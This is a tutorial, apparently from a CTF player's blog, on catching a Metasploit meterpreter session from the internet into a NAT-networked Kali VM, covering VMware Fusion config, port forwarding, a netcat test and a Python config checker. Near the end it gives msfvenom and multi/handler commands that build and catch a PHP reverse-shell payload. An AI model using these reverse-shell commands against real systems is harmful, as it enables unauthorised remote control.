Metasploit Over The Internet Behind NAT
Scenario:
> be at home > play some internet CTF > using metasploit > too cheap to use a VPS > need to catch a shell/meterpreter over the internet > behind a NAT > into a VM that is setup for NAT networking
The end goal is to catch a meterpreter session inside of a Kali VM. Start at the VM config and work outward, returning to the listener in the VM.
This is seriously for a CTF scenario. Heed the wisdom of Hackers.
- Home WiFi router with NAT/port forwarding
- MacBook Pro on OS X Yosemite (10.10.5)
- VMware Fusion 8
The Kali VM is configured with NAT networking and will use a static IP address to keep the port forwarding simple. A section must be added to `/Library/Preferences/VMware Fusion/vmnet8/dhcpd.conf` for each host assigned a static IP. The only items needed are the guest VM MAC address and the desired IP address. Append the section below the end of the "DO NOT MODIFY SECTION".

```
# -----------------------------------------------------------
# Kali VM
# -----------------------------------------------------------
host kali {
    hardware ethernet 00:0C:29:66:0D:4F;
    fixed-address 172.16.107.66;
}
```
- VMware Fusion needs to be closed before editing the configuration.
- The static IP address should be outside of the allocatable address pool to prevent a collision. In this case the pool is `range 172.16.107.128 172.16.107.254;` and the static IP is 172.16.107.66, outside the range.
The next step is to forward traffic received by VMware into the guest VM. This is done via the file `/Library/Preferences/VMware Fusion/vmnet8/nat.conf`. Locate the section `[incomingtcp]` and add the needed entry. In this scenario, 4444/tcp will be forwarded through.

```
[incomingtcp]
# -----------------------------------------------------------
# Kali VM
# -----------------------------------------------------------
4444 = 172.16.107.66:4444
```
VMware Fusion needs to be added to the firewall to accept incoming connections. In OS X:
- System Preferences
- Security & Privacy
- Unlock (bottom left)
- Firewall Options...
- Click '+'
- VMware Fusion
- Lock (bottom left)
The IP address of my MacBook Pro is 192.168.1.114. A rule was added on the router to port forward incoming connections on 4444/tcp to 192.168.1.114:4444. The specifics of this will vary per network and device, so find your own settings.
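As an added sanity check that is not part of the original write-up, the Python below parses the two VMware Fusion files edited above and reports the misconfigurations that would leave the listener unreachable: a `fixed-address` that collides with the DHCP pool, or an `[incomingtcp]` entry that does not point at a host with a static address. The file contents are constructed samples using the page's values, not the real files.

```python
import re
import ipaddress

# Constructed sample of the relevant parts of vmnet8/dhcpd.conf, using the page's values.
DHCPD_CONF = """
subnet 172.16.107.0 netmask 255.255.255.0 { range 172.16.107.128 172.16.107.254; }
# Kali VM
host kali {
    hardware ethernet 00:0C:29:66:0D:4F;
    fixed-address 172.16.107.66;
}
"""

# Constructed sample of the [incomingtcp] section of vmnet8/nat.conf.
NAT_CONF = """
[incomingtcp]
# Kali VM
4444 = 172.16.107.66:4444
"""

RANGE_RE = re.compile(r"range\s+(\S+)\s+(\S+)\s*;")
HOST_RE = re.compile(r"host\s+(\S+)\s*\{[^}]*?fixed-address\s+(\S+)\s*;[^}]*\}")
FWD_RE = re.compile(r"^\s*(\d+)\s*=\s*(\S+?):(\d+)\s*$", re.M)

def parse_dhcpd(text):
    """Return (pool_start, pool_end, {host: fixed_ip}) from a dhcpd.conf body."""
    lo, hi = RANGE_RE.search(text).groups()
    hosts = {name: ipaddress.ip_address(ip) for name, ip in HOST_RE.findall(text)}
    return ipaddress.ip_address(lo), ipaddress.ip_address(hi), hosts

def parse_incomingtcp(text):
    """Return {external_port: (guest_ip, guest_port)} from the [incomingtcp] section."""
    _, _, rest = text.partition("[incomingtcp]")  # rest is "" when the section is missing
    section = rest.split("[", 1)[0]  # stop at the next section header
    return {int(p): (ipaddress.ip_address(ip), int(gp)) for p, ip, gp in FWD_RE.findall(section)}

def check_forwarding(dhcpd_text, nat_text, port):
    """List the misconfigurations that would silently break the forwarding chain."""
    lo, hi, hosts = parse_dhcpd(dhcpd_text)
    forwards = parse_incomingtcp(nat_text)
    problems = []
    for name, ip in hosts.items():
        if lo <= ip <= hi:  # dhcpd may lease this address to another guest
            problems.append(f"{name}: fixed-address {ip} lies inside the DHCP pool {lo}-{hi}")
    if port not in forwards:
        problems.append(f"no [incomingtcp] entry for {port}")
    elif forwards[port][0] not in hosts.values():
        problems.append(f"{port} forwards to {forwards[port][0]}, which has no static host entry")
    return problems
```

Running `check_forwarding(open(dhcpd_path).read(), open(nat_path).read(), 4444)` against the real files returns an empty list when both edits are consistent.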
Load VMware Fusion and start the Kali VM. The IP address of the Kali VM should be the static one set in `dhcpd.conf`. Set up a `netcat` listener in the Kali VM.

```
root@kali:~# nc -nvlp 4444
nc: listening on :: 4444 ...
nc: listening on 0.0.0.0 4444 ...
```
From a remote system:
```
$ nc -nv 70.115.x.x 4444
nnetfd reuseport failed : Protocol not available
(UNKNOWN) [70.115.x.x] 4444 (?) open : Protocol not available
```
The connection can be confirmed in the Kali VM.
```
nc: connect to 172.16.107.66 4444 from 216.54.x.x 39409
```
Time to verify the end goal with a meterpreter shell. First set up a listener in the Kali VM.
```
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
```
Next generate a meterpreter payload with `msfvenom` in the Kali VM.

```
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=70.115.x.x LPORT=4444 -f raw > meterpreter.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 950 bytes
```
Place the payload on the target system in the CTF and execute it. Lastly, the session lands in the Kali VM.

```
[*] Starting the payload handler...
[*] Sending stage (32461 bytes) to 216.54.x.x
[*] Meterpreter session 1 opened (172.16.107.66:4444 -> 216.54.x.x:39451) at 2015-10-11 19:01:43 -0500
```
Metasploit, over the internet, behind the NAT, into the VM, nothing but net.